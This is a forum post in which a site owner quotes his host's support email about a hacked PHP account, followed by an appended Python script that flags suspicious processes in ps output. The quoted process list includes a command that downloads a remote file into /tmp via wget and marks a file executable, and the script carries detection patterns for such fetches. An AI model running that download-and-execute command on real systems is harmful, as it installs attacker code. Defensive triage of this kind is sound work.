10-07-2007, 03:51 PM   #18
boater
Junior Member
 
Join Date: Sep 2007
Posts: 3
Re: Hacker attacked my swf header.

They got in again and this time crashed my host server. Here is an email from my host:


################################################
## CUSTOMER SERVICE RESPONSE ##
################################################
[Tech: Andrew] 10/04/2007 04:12 PM
<< Status: Closed >>
-----------------------------
Your account hacked the server again. We can not allow this as it causes 100s of other users issues. This is completely against our tos. It is grounds for termination of your site. If you want us to continue hosting your site we need to know EXACTLY which script is hacking the server and how you are going to permanently stop this.

.....Unfortunately, these files within the directories noted above were not uploaded to your server because of poor operating system, kernel, or PHP base operating tools or the security measures for each. These malicious scripts were allowed onto your server due to out-dated PHP software, uploaded by you to your account, which is your duty to govern. We do not keep direct tabs on the content uploaded to each account on our server and it is not our duty to monitor the same.

Due to this, it becomes the account owner's responsibility to track down the individual PHP software within the accounts and find the compromise that allowed the upload of these malicious scripts. This service does not fall under the normal scope of the Technical assistance we provide on a daily basis. If you would like assistance with tracking these issues down, we are required to charge our normal Administrative fee for the time spent looking over the server. This service will be charged at our normal Administration fee of $100/hour, with a three hour minimum.

The information we have provided above should provide you enough evidence to take further actions as you require to prevent future scripts from being uploaded and potentially causing more severe problems or network attacks.

In order to have your account reactivated you have several possible options depending on your situation:

OPTION 1: ASSUMES that you UNDERSTAND WHAT SCRIPT CAUSED THE PROBLEM, AND you have the ability and knowledge to REMOVE the script and prevent any further problems:
ACTION REQUIRED:
a. Notify us what specific script caused the problem.
b. Notify us of your intention to REMOVE the script and prevent any further problems.
ONCE this has been done, we will REOPEN YOUR SITE (if possible).

OPTION 2: ASSUMES that you DO NOT UNDERSTAND WHAT SCRIPT CAUSED THE PROBLEM, AND you DO NOT have the ability and knowledge to REMOVE the script and prevent any further problems:
ACTION REQUIRED:
a. Notify us that you DON'T KNOW what happened and you don't know how to fix it.
If this is the case, Your site will have to be REFORMATTED. The site will be reopened blank, and you will lose all data on our servers. You will have to Reupload and configure your site, and you will not be allowed to use ANY PHP or CGI that you are not fully confident is safe, secure, up to date, and kept up to date continuously.

Below are the processes that caused this issue.

nobody 15507 0.0 0.6 11636 6660 ? S 20:56 0:00 \_ /usr/local/apache/bin/httpd -DSSL
kercheva 24674 0.0 0.6 49948 6928 ? S 21:31 0:00 | \_ /usr/bin/php admin.php
kercheva 28461 0.0 0.0 3764 1032 ? S 21:46 0:00 | \_ sh -c cd /tmp;wget http://usuarios.arnet.com.ar/larry123/borek.txt;chmod 755 readme
kercheva 28506 0.1 0.1 4508 2052 ? R 21:46 0:00 | \_ perl security
kercheva 27702 10.3 0.2 4820 2076 ? S 21:41 0:34 Morgan was here
kercheva 27706 1.4 0.2 4820 2100 ? R 21:41 0:04 Morgan was here
kercheva 27708 9.8 0.2 5004 2216 ? S 21:41 0:32 Morgan was here
kercheva 27778 10.3 0.2 4920 2560 ? S 21:42 0:31 Morgan was here
kercheva 27780 3.5 0.2 4920 2584 ? R 21:42 0:10 Morgan was here
kercheva 27782 9.9 0.2 5104 2696 ? S 21:42 0:29 Morgan was here
-----------------------------
No Response Yet
################################################
## End Customer Service Response ##
################################################
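An added example, not part of the original post or the host's email: a small Python triage over a `ps auxf`-style listing like the one the host sent. It flags the patterns visible there: a shell one-liner under the hosting account, a download into a world-writable directory, and a COMMAND column that is not a program name (which usually means the process rewrote its own title). The sample lines are constructed from that listing with the URL replaced by a placeholder; the `KNOWN` allowlist and the rule wording are assumptions.

```python
import re

# Constructed sample modelled on the listing in the email above; the download
# URL is replaced by a placeholder. Columns follow `ps auxf`:
# USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
SAMPLE = r"""
nobody 15507 0.0 0.6 11636 6660 ? S 20:56 0:00 \_ /usr/local/apache/bin/httpd -DSSL
kercheva 24674 0.0 0.6 49948 6928 ? S 21:31 0:00 | \_ /usr/bin/php admin.php
kercheva 28461 0.0 0.0 3764 1032 ? S 21:46 0:00 | \_ sh -c cd /tmp;wget http://example.invalid/x.txt;chmod 755 readme
kercheva 28506 0.1 0.1 4508 2052 ? R 21:46 0:00 | \_ perl security
kercheva 27702 10.3 0.2 4820 2076 ? S 21:41 0:34 Morgan was here
kercheva 27706 1.4 0.2 4820 2100 ? R 21:41 0:04 Morgan was here
"""

# Assumption: names a shared-hosting account is expected to run by bare name.
KNOWN = {"sh", "bash", "perl", "php", "python", "httpd"}
FETCH = re.compile(r"\b(wget|curl|fetch|lwp-download)\b")
WRITABLE = re.compile(r"/(tmp|var/tmp|dev/shm)\b")
TREE = re.compile(r"^[|\s]*\\_\s*")  # forest-view prefix such as "| \_ "

def triage(ps_text):
    """Return [(pid, user, reasons, command)] for processes worth a closer look."""
    findings = []
    for line in ps_text.strip().splitlines():
        fields = line.split(None, 10)
        if len(fields) < 11 or not fields[1].isdigit():
            continue  # header row or truncated line
        user, pid = fields[0], int(fields[1])
        command = TREE.sub("", fields[10])
        if not command:
            continue
        argv0 = command.split()[0]
        reasons = []
        if re.match(r"(sh|bash)\s+-c\b", command):
            reasons.append("shell one-liner")
        if FETCH.search(command) and WRITABLE.search(command):
            reasons.append("download into world-writable dir")
        if not argv0.startswith("/") and argv0 not in KNOWN:
            reasons.append("process title is not a program name")
        if reasons:
            findings.append((pid, user, reasons, command))
    return findings

if __name__ == "__main__":
    for pid, user, reasons, command in triage(SAMPLE):
        print(pid, user, "; ".join(reasons), "->", command)
```

The parent of a flagged shell in the forest view (here the `php admin.php` line directly above it) is the script to examine first when answering the host's "which script" question.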